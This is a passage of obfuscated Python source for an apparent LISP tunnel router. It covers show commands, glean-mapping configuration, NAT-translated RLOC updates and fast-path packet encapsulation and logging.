if 48 - 48: OoooooooOO % o0oOOo0O0Ooo . I1IiiI - Ii1I % i1IIi % OoooooooOO
if 3 - 3: iII111i + O0
if 42 - 42: OOooOOo / i1IIi + i11iIiiIii - Ii1I
oo0Ooo0 = ( os . getenv ( "LISP_RTR_FAST_DATA_PLANE" ) != None )
I1I11I1I1I = ( os . getenv ( "LISP_RTR_LATENCY_DEBUG" ) != None )
if 90 - 90: II111iiii + oO0o / o0oOOo0O0Ooo % II111iiii - O0
if 29 - 29: o0oOOo0O0Ooo / iIii1I11I1II1
if 24 - 24: O0 % o0oOOo0O0Ooo + i1IIi + I1Ii111 + I1ii11iIi11i
if 70 - 70: Oo0Ooo % Oo0Ooo . IiII % OoO0O00 * o0oOOo0O0Ooo % oO0o
if 23 - 23: i11iIiiIii + I1IiiI
if 68 - 68: OoOoOO00 . oO0o . i11iIiiIii
if 40 - 40: oO0o . OoOoOO00 . Oo0Ooo . i1IIi
if 33 - 33: Ii1I + II111iiii % i11iIiiIii . ooOoO0o - I1IiiI
def O00oooo0O ( parameter ) :
global I11
if 22 - 22: OoooooooOO % I11i - iII111i . iIii1I11I1II1 * i11iIiiIii
return ( lispconfig . lisp_itr_rtr_show_command ( parameter , "RTR" ,
I11 ) )
if 32 - 32: Oo0Ooo * O0 % oO0o % Ii1I . IiII
if 61 - 61: ooOoO0o
if 79 - 79: Oo0Ooo + I1IiiI - iII111i
if 83 - 83: ooOoO0o
if 64 - 64: OoO0O00 % ooOoO0o % iII111i / OoOoOO00 - OoO0O00
if 74 - 74: iII111i * O0
if 89 - 89: oO0o + Oo0Ooo
def Ii1IOo0o0 ( parameter ) :
global I11
if 49 - 49: oO0o % Ii1I + i1IIi . I1IiiI % I1ii11iIi11i
return ( lispconfig . lisp_itr_rtr_show_command ( parameter , "RTR" , I11 ,
True ) )
if 48 - 48: I11i + I11i / II111iiii / iIii1I11I1II1
if 20 - 20: o0oOOo0O0Ooo
if 77 - 77: OoOoOO00 / I11i
if 98 - 98: iIii1I11I1II1 / i1IIi / i11iIiiIii / o0oOOo0O0Ooo
if 28 - 28: OOooOOo - IiII . IiII + OoOoOO00 - OoooooooOO + O0
if 95 - 95: OoO0O00 % oO0o . O0
if 15 - 15: ooOoO0o / Ii1I . Ii1I - i1IIi
def o00oOO0 ( parameter ) :
return ( lispconfig . lisp_show_crypto_list ( "RTR" ) )
if 95 - 95: OOooOOo / OoooooooOO
if 18 - 18: i11iIiiIii
if 46 - 46: i1IIi / I11i % OOooOOo + I1Ii111
if 79 - 79: I1Ii111 - o0oOOo0O0Ooo + I1Ii111 - iII111i
if 8 - 8: I1IiiI
if 75 - 75: iIii1I11I1II1 / OOooOOo % o0oOOo0O0Ooo * OoOoOO00
if 9 - 9: OoO0O00
def i11 ( kv_pair ) :
lispconfig . lisp_database_mapping_command ( kv_pair )
if 58 - 58: OOooOOo * i11iIiiIii / OoOoOO00 % I1Ii111 - I1ii11iIi11i / oO0o
if 50 - 50: I1IiiI
if 34 - 34: I1IiiI * II111iiii % iII111i * OoOoOO00 - I1IiiI
if 33 - 33: o0oOOo0O0Ooo + OOooOOo * OoO0O00 - Oo0Ooo / oO0o % Ii1I
if 21 - 21: OoO0O00 * iIii1I11I1II1 % oO0o * i1IIi
if 16 - 16: O0 - I1Ii111 * iIii1I11I1II1 + iII111i
if 50 - 50: II111iiii - ooOoO0o * I1ii11iIi11i / I1Ii111 + o0oOOo0O0Ooo
def O0O0O ( kv_pair ) :
oO0Oo = { "rloc-probe" : False , "igmp-query" : False }
if 54 - 54: o0oOOo0O0Ooo - I1IiiI + OoooooooOO
for O0o0 in kv_pair . keys ( ) :
OO00Oo = kv_pair [ O0o0 ]
if 51 - 51: IiII * o0oOOo0O0Ooo + I11i + OoO0O00
if ( O0o0 == "instance-id" ) :
o0O0O00 = OO00Oo . split ( "-" )
oO0Oo [ "instance-id" ] = [ 0 , 0 ]
if ( len ( o0O0O00 ) == 1 ) :
oO0Oo [ "instance-id" ] [ 0 ] = int ( o0O0O00 [ 0 ] )
oO0Oo [ "instance-id" ] [ 1 ] = int ( o0O0O00 [ 0 ] )
else :
oO0Oo [ "instance-id" ] [ 0 ] = int ( o0O0O00 [ 0 ] )
oO0Oo [ "instance-id" ] [ 1 ] = int ( o0O0O00 [ 1 ] )
if 86 - 86: I11i / IiII % i11iIiiIii
if 7 - 7: ooOoO0o * OoO0O00 % oO0o . IiII
if ( O0o0 == "eid-prefix" ) :
Ii1iIiII1ii1 = lisp . lisp_address ( lisp . LISP_AFI_NONE , "" , 0 , 0 )
Ii1iIiII1ii1 . store_prefix ( OO00Oo )
oO0Oo [ "eid-prefix" ] = Ii1iIiII1ii1
if 62 - 62: iIii1I11I1II1 * OoOoOO00
if ( O0o0 == "group-prefix" ) :
i1 = lisp . lisp_address ( lisp . LISP_AFI_NONE , "" , 0 , 0 )
i1 . store_prefix ( OO00Oo )
oO0Oo [ "group-prefix" ] = i1
if 91 - 91: OoO0O00 . I1ii11iIi11i + OoO0O00 - iII111i / OoooooooOO
if ( O0o0 == "rloc-prefix" ) :
iII1 = lisp . lisp_address ( lisp . LISP_AFI_NONE , "" , 0 , 0 )
iII1 . store_prefix ( OO00Oo )
oO0Oo [ "rloc-prefix" ] = iII1
if 30 - 30: II111iiii - OOooOOo - i11iIiiIii % OoOoOO00 - II111iiii * Ii1I
if ( O0o0 == "rloc-probe" ) :
oO0Oo [ "rloc-probe" ] = ( OO00Oo == "yes" )
if 61 - 61: oO0o - I11i % OOooOOo
if ( O0o0 == "igmp-query" ) :
oO0Oo [ "igmp-query" ] = ( OO00Oo == "yes" )
if 84 - 84: oO0o * OoO0O00 / I11i - O0
if 30 - 30: iIii1I11I1II1 / ooOoO0o - I1Ii111 - II111iiii % iII111i
if 49 - 49: I1IiiI % ooOoO0o . ooOoO0o . I11i * ooOoO0o
if 97 - 97: Ii1I + o0oOOo0O0Ooo . OOooOOo + I1ii11iIi11i % iII111i
if 95 - 95: i1IIi
if 3 - 3: I1Ii111 - O0 / I1Ii111 % OoO0O00 / I1Ii111 . I1IiiI
for iiI111I1iIiI in lisp . lisp_glean_mappings :
if ( iiI111I1iIiI . has_key ( "eid-prefix" ) ^ oO0Oo . has_key ( "eid-prefix" ) ) : continue
if ( iiI111I1iIiI . has_key ( "eid-prefix" ) and oO0Oo . has_key ( "eid-prefix" ) ) :
II = iiI111I1iIiI [ "eid-prefix" ]
Ii1I1IIii1II = oO0Oo [ "eid-prefix" ]
if ( II . is_exact_match ( Ii1I1IIii1II ) == False ) : continue
if 65 - 65: Ii1I . iIii1I11I1II1 / O0 - Ii1I
if 21 - 21: I1IiiI * iIii1I11I1II1
if ( iiI111I1iIiI . has_key ( "group-prefix" ) ^ oO0Oo . has_key ( "group-prefix" ) ) :
continue
if 91 - 91: IiII
if ( iiI111I1iIiI . has_key ( "group-prefix" ) and oO0Oo . has_key ( "group-prefix" ) ) :
II = iiI111I1iIiI [ "group-prefix" ]
Ii1I1IIii1II = oO0Oo [ "group-prefix" ]
if ( II . is_exact_match ( Ii1I1IIii1II ) == False ) : continue
if 15 - 15: II111iiii
if 18 - 18: i11iIiiIii . i1IIi % OoooooooOO / O0
if ( iiI111I1iIiI . has_key ( "rloc-prefix" ) ^ oO0Oo . has_key ( "rloc-prefix" ) ) : continue
if ( iiI111I1iIiI . has_key ( "rloc-prefix" ) and oO0Oo . has_key ( "rloc-prefix" ) ) :
II = iiI111I1iIiI [ "rloc-prefix" ]
Ii1I1IIii1II = oO0Oo [ "rloc-prefix" ]
if ( II . is_exact_match ( Ii1I1IIii1II ) == False ) : continue
if 75 - 75: OoOoOO00 % o0oOOo0O0Ooo % o0oOOo0O0Ooo . I1Ii111
if 5 - 5: o0oOOo0O0Ooo * ooOoO0o + OoOoOO00 . OOooOOo + OoOoOO00
if ( iiI111I1iIiI . has_key ( "instance-id" ) ^ oO0Oo . has_key ( "instance-id" ) ) : continue
if ( iiI111I1iIiI . has_key ( "instance-id" ) and oO0Oo . has_key ( "instance-id" ) ) :
II = iiI111I1iIiI [ "instance-id" ]
Ii1I1IIii1II = oO0Oo [ "instance-id" ]
if ( II != Ii1I1IIii1II ) : continue
if 91 - 91: O0
if 61 - 61: II111iiii
if 64 - 64: ooOoO0o / OoOoOO00 - O0 - I11i
if 86 - 86: I11i % OoOoOO00 / I1IiiI / OoOoOO00
if 42 - 42: OoO0O00
return
if 67 - 67: I1Ii111 . iII111i . O0
if 10 - 10: I1ii11iIi11i % I1ii11iIi11i - iIii1I11I1II1 / OOooOOo + Ii1I
if 87 - 87: oO0o * I1ii11iIi11i + OOooOOo / iIii1I11I1II1 / iII111i
if 37 - 37: iII111i - ooOoO0o * oO0o % i11iIiiIii - I1Ii111
if 83 - 83: I11i / I1IiiI
lisp . lisp_glean_mappings . append ( oO0Oo )
if 34 - 34: IiII
if 57 - 57: oO0o . I11i . i1IIi
if 42 - 42: I11i + I1ii11iIi11i % O0
if 6 - 6: oO0o
if 68 - 68: OoOoOO00 - OoO0O00
if 28 - 28: OoO0O00 . OOooOOo / OOooOOo + Oo0Ooo . I1ii11iIi11i
if 1 - 1: iIii1I11I1II1 / II111iiii
def iiI1I11i1i ( parameter ) :
return ( lispconfig . lisp_itr_rtr_show_rloc_probe_command ( "RTR" ) )
if 2 - 2: I1ii11iIi11i * I11i - iIii1I11I1II1 + I1IiiI . oO0o % iII111i
if 92 - 92: iII111i
if 25 - 25: Oo0Ooo - I1IiiI / OoooooooOO / o0oOOo0O0Ooo
if 12 - 12: I1IiiI * iII111i % i1IIi % iIii1I11I1II1
if 20 - 20: OOooOOo % Ii1I / Ii1I + Ii1I
if 45 - 45: oO0o - IiII - OoooooooOO - OoO0O00 . II111iiii / O0
if 51 - 51: O0 + iII111i
def IIIII11I1IiI ( mc , parms ) :
i1I , iII1 , OoOO , ooOOO0 = parms
if 65 - 65: O0
oO00OOoO00 = "{}:{}" . format ( iII1 . print_address_no_iid ( ) , OoOO )
Ii1iIiII1ii1 = lisp . green ( mc . print_eid_tuple ( ) , False )
IiI111111IIII = "Changed '{}' translated address:port to {} for EID {}, {} {}" . format ( ooOOO0 , lisp . red ( oO00OOoO00 , False ) , Ii1iIiII1ii1 , "{}" , "{}" )
if 37 - 37: I1Ii111 / OoOoOO00
if 23 - 23: O0
for o00oO0oOo00 in mc . rloc_set :
if ( o00oO0oOo00 . rle ) :
for oO0oOo0 in o00oO0oOo00 . rle . rle_nodes :
if ( oO0oOo0 . rloc_name != ooOOO0 ) : continue
oO0oOo0 . store_translated_rloc ( iII1 , OoOO )
I1I1I = oO0oOo0 . address . print_address_no_iid ( ) + ":" + str ( oO0oOo0 . translated_port )
if 95 - 95: II111iiii + o0oOOo0O0Ooo + iII111i * iIii1I11I1II1 % oO0o / IiII
lisp . lprint ( IiI111111IIII . format ( "RLE" , I1I1I ) )
if 56 - 56: iII111i
if 86 - 86: II111iiii % I1Ii111
if 15 - 15: i1IIi * I1IiiI + i11iIiiIii
if ( o00oO0oOo00 . rloc_name != ooOOO0 ) : continue
if 6 - 6: ooOoO0o / i11iIiiIii + iII111i * oO0o
if 80 - 80: II111iiii
if 83 - 83: I11i . i11iIiiIii + II111iiii . o0oOOo0O0Ooo * I11i
if 53 - 53: II111iiii
if 31 - 31: OoO0O00
if 80 - 80: I1Ii111 . i11iIiiIii - o0oOOo0O0Ooo
I1I1I = o00oO0oOo00 . rloc . print_address_no_iid ( ) + ":" + str ( o00oO0oOo00 . translated_port )
if 25 - 25: OoO0O00
if ( lisp . lisp_crypto_keys_by_rloc_encap . has_key ( I1I1I ) ) :
oOo0oO = lisp . lisp_crypto_keys_by_rloc_encap [ I1I1I ]
lisp . lisp_crypto_keys_by_rloc_encap [ oO00OOoO00 ] = oOo0oO
if 51 - 51: Oo0Ooo - oO0o + II111iiii * Ii1I . I11i + oO0o
if 78 - 78: i11iIiiIii / iII111i - Ii1I / OOooOOo + oO0o
if 82 - 82: Ii1I
if 46 - 46: OoooooooOO . i11iIiiIii
if 94 - 94: o0oOOo0O0Ooo * Ii1I / Oo0Ooo / Ii1I
o00oO0oOo00 . delete_from_rloc_probe_list ( mc . eid , mc . group )
o00oO0oOo00 . store_translated_rloc ( iII1 , OoOO )
o00oO0oOo00 . add_to_rloc_probe_list ( mc . eid , mc . group )
lisp . lprint ( IiI111111IIII . format ( "RLOC" , I1I1I ) )
if 87 - 87: Oo0Ooo . IiII
if 75 - 75: ooOoO0o + OoOoOO00 + o0oOOo0O0Ooo * I11i % oO0o . iII111i
if 55 - 55: OOooOOo . I1IiiI
if 61 - 61: Oo0Ooo % IiII . Oo0Ooo
if ( lisp . lisp_rloc_probing ) :
o0oOO000oO0oo = None if ( mc . group . is_null ( ) ) else mc . eid
oOO00O = mc . eid if ( mc . group . is_null ( ) ) else mc . group
lisp . lisp_send_map_request ( i1I , 0 , o0oOO000oO0oo , oOO00O , o00oO0oOo00 )
if 77 - 77: Oo0Ooo - i1IIi - I11i . OoOoOO00
if 39 - 39: II111iiii / ooOoO0o + I1Ii111 / OoOoOO00
if 13 - 13: IiII + O0 + iII111i % I1IiiI / o0oOOo0O0Ooo . IiII
if 86 - 86: oO0o * o0oOOo0O0Ooo % i1IIi . Ii1I . i11iIiiIii
if 56 - 56: I1ii11iIi11i % O0 - I1IiiI
if 100 - 100: Ii1I - O0 % oO0o * OOooOOo + I1IiiI
lisp . lisp_write_ipc_map_cache ( True , mc )
return ( True , parms )
if 88 - 88: OoooooooOO - OoO0O00 * O0 * OoooooooOO . OoooooooOO
if 33 - 33: I1Ii111 + iII111i * oO0o / iIii1I11I1II1 - I1IiiI
if 54 - 54: I1Ii111 / OOooOOo . oO0o % iII111i
if 57 - 57: i11iIiiIii . I1ii11iIi11i - Ii1I - oO0o + OoOoOO00
if 63 - 63: OoOoOO00 * iII111i
if 69 - 69: O0 . OoO0O00
if 49 - 49: I1IiiI - I11i
def OoOOoOooooOOo ( mc , parms ) :
if 87 - 87: I1IiiI
if 58 - 58: OoOoOO00 % o0oOOo0O0Ooo
if 50 - 50: I1Ii111 . o0oOOo0O0Ooo
if 97 - 97: O0 + OoOoOO00
if ( mc . group . is_null ( ) ) : return ( IIIII11I1IiI ( mc , parms ) )
if 89 - 89: o0oOOo0O0Ooo + OoO0O00 * I11i * Ii1I
if ( mc . source_cache == None ) : return ( True , parms )
if 37 - 37: OoooooooOO - O0 - o0oOOo0O0Ooo
if 77 - 77: OOooOOo * iIii1I11I1II1
if 98 - 98: I1IiiI % Ii1I * OoooooooOO
if 51 - 51: iIii1I11I1II1 . OoOoOO00 / oO0o + o0oOOo0O0Ooo
if 33 - 33: ooOoO0o . II111iiii % iII111i + o0oOOo0O0Ooo
mc . source_cache . walk_cache ( IIIII11I1IiI , parms )
return ( True , parms )
if 71 - 71: Oo0Ooo % OOooOOo
if 98 - 98: I11i % i11iIiiIii % ooOoO0o + Ii1I
if 78 - 78: I1ii11iIi11i % oO0o / iII111i - iIii1I11I1II1
if 69 - 69: I1Ii111
if 11 - 11: I1IiiI
if 16 - 16: Ii1I + IiII * O0 % i1IIi . I1IiiI
if 67 - 67: OoooooooOO / I1IiiI * Ii1I + I11i
if 65 - 65: OoooooooOO - I1ii11iIi11i / ooOoO0o / II111iiii / i1IIi
def o00oo0 ( sockets , hostname , rloc , port ) :
lisp . lisp_map_cache . walk_cache ( OoOOoOooooOOo ,
[ sockets , rloc , port , hostname ] )
return
if 38 - 38: ooOoO0o % II111iiii % I11i / OoO0O00 + OoOoOO00 / i1IIi
if 54 - 54: iIii1I11I1II1 % I1ii11iIi11i - OOooOOo / oO0o - OoO0O00 . I11i
if 11 - 11: I1ii11iIi11i . OoO0O00 * IiII * OoooooooOO + ooOoO0o
if 33 - 33: O0 * o0oOOo0O0Ooo - I1Ii111 % I1Ii111
if 18 - 18: I1Ii111 / Oo0Ooo * I1Ii111 + I1Ii111 * i11iIiiIii * I1ii11iIi11i
if 11 - 11: ooOoO0o / OoOoOO00 - IiII * OoooooooOO + OoooooooOO . OoOoOO00
if 26 - 26: Ii1I % I1ii11iIi11i
def o00Oo0oooooo ( sred , packet ) :
if ( lisp . lisp_data_plane_logging == False ) : return
if 76 - 76: I11i / OOooOOo . O0 % I1IiiI . o0oOOo0O0Ooo + IiII
if ( sred in [ "Send" , "Receive" ] ) :
o0o = binascii . hexlify ( packet [ 0 : 20 ] )
lisp . lprint ( "Fast-{}: ip {} {} {} {} {}" . format ( sred , o0o [ 0 : 8 ] , o0o [ 8 : 16 ] ,
o0o [ 16 : 24 ] , o0o [ 24 : 32 ] , o0o [ 32 : 40 ] ) )
elif ( sred in [ "Encap" , "Decap" ] ) :
o0o = binascii . hexlify ( packet [ 0 : 36 ] )
lisp . lprint ( "Fast-{}: ip {} {} {} {} {}, udp {} {}, lisp {} {}" . format ( sred , o0o [ 0 : 8 ] , o0o [ 8 : 16 ] , o0o [ 16 : 24 ] , o0o [ 24 : 32 ] , o0o [ 32 : 40 ] ,
# iIii1I11I1II1 / I11i . OoO0O00 - o0oOOo0O0Ooo
o0o [ 40 : 48 ] , o0o [ 48 : 56 ] , o0o [ 56 : 64 ] , o0o [ 64 : 72 ] ) )
if 48 - 48: i1IIi - Ii1I / O0 * OoO0O00
if 71 - 71: I1ii11iIi11i
if 7 - 7: I1ii11iIi11i - I1IiiI . iIii1I11I1II1 - i1IIi
if 59 - 59: o0oOOo0O0Ooo
if 81 - 81: OoOoOO00 - OoOoOO00 . iII111i
if 73 - 73: I11i % i11iIiiIii - I1IiiI
if 7 - 7: O0 * i11iIiiIii * Ii1I + ooOoO0o % OoO0O00 - ooOoO0o
if 39 - 39: Oo0Ooo * OOooOOo % OOooOOo - OoooooooOO + o0oOOo0O0Ooo - I11i
def ii ( dest , mc ) :
if ( lisp . lisp_data_plane_logging == False ) : return
if 68 - 68: iII111i - I1IiiI / I1Ii111 / I11i
I11iiii = "miss" if mc == None else "hit!"
lisp . lprint ( "Fast-Lookup {} {}" . format ( dest . print_address ( ) , I11iiii ) )
if 60 - 60: I11i . i1IIi + IiII / o0oOOo0O0Ooo . II111iiii
if 82 - 82: I1ii11iIi11i / I1IiiI % iIii1I11I1II1 / i1IIi - I1IiiI
if 7 - 7: I1Ii111 * OoO0O00 - ooOoO0o + OOooOOo * I1IiiI % OoO0O00
if 15 - 15: OoOoOO00 % I1IiiI * I11i
if 81 - 81: ooOoO0o - iIii1I11I1II1 - i1IIi / I1Ii111 - O0 * I11i
if 20 - 20: oO0o % IiII
if 19 - 19: I1ii11iIi11i % IiII + ooOoO0o / I1Ii111 . ooOoO0o
if 12 - 12: i1IIi + i1IIi - I1ii11iIi11i * Oo0Ooo % Oo0Ooo - II111iiii
def o0O ( ts , msg ) :
global I1I11I1I1I
if 84 - 84: OoO0O00 + i1IIi - II111iiii . I1ii11iIi11i * OoooooooOO + I1IiiI
if ( I1I11I1I1I == False ) : return ( None )
if 38 - 38: OOooOOo + II111iiii % ooOoO0o % OoOoOO00 - Ii1I / OoooooooOO
if 73 - 73: o0oOOo0O0Ooo * O0 - i11iIiiIii
if 85 - 85: Ii1I % iII111i + I11i / o0oOOo0O0Ooo . oO0o + OOooOOo
if 62 - 62: i11iIiiIii + i11iIiiIii - o0oOOo0O0Ooo
if ( ts == None ) : return ( time . time ( ) )
if 28 - 28: iII111i . iII111i % iIii1I11I1II1 * iIii1I11I1II1 . o0oOOo0O0Ooo / iII111i
if 27 - 27: OoO0O00 + ooOoO0o - i1IIi
if 69 - 69: IiII - O0 % I1ii11iIi11i + i11iIiiIii . OoOoOO00 / OoO0O00
if 79 - 79: O0 * i11iIiiIii - IiII / IiII
ts = ( time . time ( ) - ts ) * 1000000
lisp . lprint ( "{}-Latency: {} usecs" . format ( msg , round ( ts , 1 ) ) , "force" )
return ( None )
if 48 - 48: O0
if 93 - 93: i11iIiiIii - I1IiiI * I1ii11iIi11i * I11i % O0 + OoooooooOO
if 25 - 25: IiII + Ii1I / ooOoO0o . o0oOOo0O0Ooo % O0 * OoO0O00
if 84 - 84: ooOoO0o % Ii1I + i11iIiiIii
if 28 - 28: Oo0Ooo + OoO0O00 * OOooOOo % oO0o . I11i % O0
if 16 - 16: I11i - iIii1I11I1II1 / I1IiiI . II111iiii + iIii1I11I1II1
if 19 - 19: OoO0O00 - Oo0Ooo . O0
if 60 - 60: II111iiii + Oo0Ooo
def I1IiIiiIiIII ( a ) :
iIIi = ord ( a [ 0 ] ) << 24 | ord ( a [ 1 ] ) << 16 | ord ( a [ 2 ] ) << 8 | ord ( a [ 3 ] )
return ( iIIi )
if 11 - 11: I1IiiI * oO0o
if 81 - 81: iII111i + IiII
if 98 - 98: I1IiiI
if 95 - 95: ooOoO0o / ooOoO0o
if 30 - 30: I1ii11iIi11i + Oo0Ooo / Oo0Ooo % I1ii11iIi11i . I1ii11iIi11i
if 55 - 55: ooOoO0o - I11i + II111iiii + iII111i % Ii1I
if 41 - 41: i1IIi - I11i - Ii1I
if 8 - 8: OoO0O00 + I1Ii111 - o0oOOo0O0Ooo % Oo0Ooo % o0oOOo0O0Ooo * oO0o
if 9 - 9: Oo0Ooo - i11iIiiIii - OOooOOo * Ii1I + ooOoO0o
if 44 - 44: II111iiii
if 52 - 52: I1ii11iIi11i - Oo0Ooo + I1ii11iIi11i % o0oOOo0O0Ooo
if 35 - 35: iIii1I11I1II1
if 42 - 42: I1Ii111 . I1IiiI . i1IIi + OoOoOO00 + OOooOOo + I1IiiI
if 31 - 31: iII111i . OOooOOo - ooOoO0o . OoooooooOO / OoooooooOO
if 56 - 56: OoO0O00 / oO0o / i11iIiiIii + OoooooooOO - Oo0Ooo - I11i
if 21 - 21: O0 % IiII . I1IiiI / II111iiii + IiII
if 53 - 53: oO0o - I1IiiI - oO0o * iII111i
if 71 - 71: O0 - iIii1I11I1II1
if 12 - 12: OOooOOo / o0oOOo0O0Ooo
iiI1I1 = lisp . lisp_address ( lisp . LISP_AFI_IPV4 , "" , 32 , 0 )
ooO = lisp . lisp_address ( lisp . LISP_AFI_IPV4 , "" , 32 , 0 )
if 6 - 6: iIii1I11I1II1 . ooOoO0o % o0oOOo0O0Ooo
def I1Iii1 ( packet ) :
global lisp_map_cache , OOo
if 30 - 30: OoooooooOO - OoOoOO00
Ooo00O0o = o0O ( None , "Fast" )
if 72 - 72: iIii1I11I1II1 * Ii1I % ooOoO0o / OoO0O00
if 35 - 35: ooOoO0o + i1IIi % I1ii11iIi11i % I11i + oO0o
if 17 - 17: i1IIi
if 21 - 21: Oo0Ooo
if 29 - 29: I11i / II111iiii / ooOoO0o * OOooOOo
I111i1i1111 = 0
IIII1 = None
if ( packet [ 9 ] == '\x11' ) :
if ( packet [ 20 : 22 ] == '\x10\xf6' ) : return ( False )
if ( packet [ 22 : 24 ] == '\x10\xf6' ) : return ( False )
if 10 - 10: I1Ii111 / ooOoO0o + i11iIiiIii / Ii1I
if ( packet [ 20 : 22 ] == '\x10\xf5' or packet [ 22 : 24 ] == '\x10\xf5' ) :
IIII1 = packet [ 12 : 16 ]
I111i1i1111 = packet [ 32 : 35 ]
I111i1i1111 = ord ( I111i1i1111 [ 0 ] ) << 16 | ord ( I111i1i1111 [ 1 ] ) << 8 | ord ( I111i1i1111 [ 2 ] )
if ( I111i1i1111 == 0xffffff ) : return ( False )
o00Oo0oooooo ( "Decap" , packet )
packet = packet [ 36 : : ]
if 74 - 74: OOooOOo + O0 + i1IIi - i1IIi + II111iiii
if 83 - 83: I1ii11iIi11i - I1IiiI + OOooOOo
if 5 - 5: Ii1I
o00Oo0oooooo ( "Receive" , packet )
if 46 - 46: IiII
if 45 - 45: ooOoO0o
if 21 - 21: oO0o . I1Ii111 . OOooOOo / Oo0Ooo / I1Ii111
if 17 - 17: OOooOOo / OOooOOo / I11i
ii1 = I1IiIiiIiIII ( packet [ 16 : 20 ] )
ooO . instance_id = I111i1i1111
ooO . address = ii1
if 1 - 1: ooOoO0o % iIii1I11I1II1 + Oo0Ooo . iIii1I11I1II1 % I1IiiI
if 89 - 89: Ii1I
if 76 - 76: ooOoO0o
if 15 - 15: OOooOOo . I11i + OoooooooOO - OoO0O00
if ( ( ii1 & 0xe0000000 ) == 0xe0000000 ) : return ( False )
if 69 - 69: iIii1I11I1II1 . I1ii11iIi11i % ooOoO0o + iIii1I11I1II1 / O0 / I1ii11iIi11i
if 61 - 61: OOooOOo % OOooOOo * o0oOOo0O0Ooo / o0oOOo0O0Ooo
if 75 - 75: IiII . ooOoO0o
if 50 - 50: OoOoOO00
ii1 = ooO
O00o0OO0000oo = lisp . lisp_map_cache . lookup_cache ( ii1 , False )
ii ( ii1 , O00o0OO0000oo )
if ( O00o0OO0000oo == None ) : return ( False )
if 27 - 27: O0
if 79 - 79: o0oOOo0O0Ooo - I11i + o0oOOo0O0Ooo . oO0o
if 28 - 28: i1IIi - iII111i
if 54 - 54: iII111i - O0 % OOooOOo
if 73 - 73: O0 . OoOoOO00 + I1IiiI - I11i % I11i . I11i
if ( IIII1 != None ) :
I11ii1i1 = I1IiIiiIiIII ( packet [ 12 : 16 ] )
iiI1I1 . instance_id = I111i1i1111
iiI1I1 . address = I11ii1i1
ooo0OoOOOOO = lisp . lisp_map_cache . lookup_cache ( iiI1I1 , False )
if ( ooo0OoOOOOO == None ) :
i1iIi1iI , i1I11IiI1iiII , o00oOo0oOoo = lisp . lisp_allow_gleaning ( iiI1I1 , None ,
None )
if ( i1iIi1iI ) : return ( False )
elif ( ooo0OoOOOOO . gleaned ) :
IIII1 = I1IiIiiIiIII ( IIII1 )
if ( ooo0OoOOOOO . rloc_set [ 0 ] . rloc . address != IIII1 ) : return ( False )
if 57 - 57: OoOoOO00 - I1ii11iIi11i
if 50 - 50: I1Ii111 / i1IIi % OoO0O00 . I1IiiI / iII111i
if 88 - 88: OOooOOo . I11i * o0oOOo0O0Ooo . OoOoOO00 / ooOoO0o . I11i
if 10 - 10: o0oOOo0O0Ooo * Oo0Ooo % O0 * iIii1I11I1II1 . O0 % I1ii11iIi11i
if 44 - 44: II111iiii / iII111i / I11i % II111iiii / i1IIi . Ii1I
O00o0OO0000oo . add_recent_source ( iiI1I1 )
if 59 - 59: OoooooooOO
if 47 - 47: ooOoO0o - I1IiiI / II111iiii
if 12 - 12: OOooOOo
if 83 - 83: iII111i . O0 / Oo0Ooo / OOooOOo - II111iiii
if 100 - 100: OoO0O00
if ( O00o0OO0000oo . action == lisp . LISP_NATIVE_FORWARD_ACTION and
O00o0OO0000oo . eid . instance_id == 0 ) :
ii1 . instance_id = lisp . lisp_default_secondary_iid
O00o0OO0000oo = lisp . lisp_map_cache . lookup_cache ( ii1 , False )
ii ( ii1 , O00o0OO0000oo )
if ( O00o0OO0000oo == None ) : return ( False )
if 46 - 46: OoOoOO00 / iIii1I11I1II1 % iII111i . iIii1I11I1II1 * iII111i
if 38 - 38: I1ii11iIi11i - iII111i / O0 . I1Ii111
if 45 - 45: I1Ii111
if 83 - 83: OoOoOO00 . OoooooooOO
if 58 - 58: i11iIiiIii + OoooooooOO % OoooooooOO / IiII / i11iIiiIii
if 62 - 62: OoO0O00 / I1ii11iIi11i
if ( O00o0OO0000oo . action != lisp . LISP_NATIVE_FORWARD_ACTION ) :
if ( O00o0OO0000oo . best_rloc_set == [ ] ) : return ( False )
if 7 - 7: OoooooooOO . IiII
ii1 = O00o0OO0000oo . best_rloc_set [ 0 ]
if ( ii1 . state != lisp . LISP_RLOC_UP_STATE ) : return ( False )
if 53 - 53: Ii1I % Ii1I * o0oOOo0O0Ooo + OoOoOO00
I111i1i1111 = O00o0OO0000oo . eid . instance_id
OoOO = ii1 . translated_port
Oooo00 = ii1 . stats
ii1 = ii1 . rloc
I111iIi1 = ii1 . address
IIII1 = lisp . lisp_myrlocs [ 0 ] . address
if 92 - 92: ooOoO0o
if 22 - 22: Oo0Ooo % iII111i * I1ii11iIi11i / OOooOOo % i11iIiiIii * I11i
if 95 - 95: OoooooooOO - IiII * I1IiiI + OoOoOO00
if 10 - 10: o0oOOo0O0Ooo / i11iIiiIii
o00 = '\x45\x00'
oO = len ( packet ) + 20 + 8 + 8
o00 += chr ( ( oO >> 8 ) & 0xff ) + chr ( oO & 0xff )
o00 += '\xff\xff\x40\x00\x10\x11\x00\x00'
o00 += chr ( ( IIII1 >> 24 ) & 0xff )
o00 += chr ( ( IIII1 >> 16 ) & 0xff )
o00 += chr ( ( IIII1 >> 8 ) & 0xff )
o00 += chr ( IIII1 & 0xff )
o00 += chr ( ( I111iIi1 >> 24 ) & 0xff )
o00 += chr ( ( I111iIi1 >> 16 ) & 0xff )
o00 += chr ( ( I111iIi1 >> 8 ) & 0xff )
o00 += chr ( I111iIi1 & 0xff )
o00 = lisp . lisp_ip_checksum ( o00 )
if 92 - 92: IiII * Oo0Ooo * Oo0Ooo * I1IiiI . iIii1I11I1II1
if 16 - 16: ooOoO0o % OoooooooOO - OOooOOo * Ii1I * I1ii11iIi11i / OoooooooOO
if 31 - 31: I11i . I1Ii111 * ooOoO0o + i11iIiiIii * oO0o
if 93 - 93: I1ii11iIi11i / iIii1I11I1II1 * i1IIi % OoooooooOO * O0 * I11i
Ooooooo = oO - 20
I1IIIiI1I1ii1 = '\xff\x00' if ( OoOO == 4341 ) else '\x10\xf5'
I1IIIiI1I1ii1 += chr ( ( OoOO >> 8 ) & 0xff ) + chr ( OoOO & 0xff )
I1IIIiI1I1ii1 += chr ( ( Ooooooo >> 8 ) & 0xff ) + chr ( Ooooooo & 0xff ) + '\x00\x00'
if 30 - 30: O0 * OoooooooOO
I1IIIiI1I1ii1 += '\x08\xdf\xdf\xdf'
I1IIIiI1I1ii1 += chr ( ( I111i1i1111 >> 16 ) & 0xff )
